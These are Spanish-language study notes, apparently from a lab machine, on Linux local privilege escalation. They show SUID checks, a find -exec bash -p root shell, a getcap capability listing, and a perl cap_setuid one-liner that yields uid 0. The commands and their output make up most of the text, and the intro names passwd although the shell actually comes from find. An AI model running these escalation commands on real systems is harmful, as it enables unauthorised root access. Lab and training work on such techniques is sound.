Debemos comprobar siempre los permisos del binario passwd, puede ser una via potencial de escalar privilegios
joe@debian-privesc:~$ ls -asl /usr/bin/passwd
64 -rwsr-xr-x 1root root 63736 Jul 27 2018 /usr/bin/passwd
Podemos exploitarlo así:
joe@debian-privesc:~$ find /home/joe/Desktop -exec "/usr/bin/bash" -p \\;
bash-5.0# id
uid=1000(joe) gid=1000(joe) euid=0(root) groups=1000(joe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)
bash-5.0# whoami
root
En cuanto a capabilities, podemos listarlas de la siguiente manera
joe@debian-privesc:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
El siguiente paso sería en https://gtfobins.github.io/ comprobar si podemos utilizar alguna para escalar privilegios, y en la misma web nos indicará la manera de hacerlo.
joe@debian-privesc:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
perl: warning: Setting locale failed.
...
# id
uid=0(root) gid=1000(joe)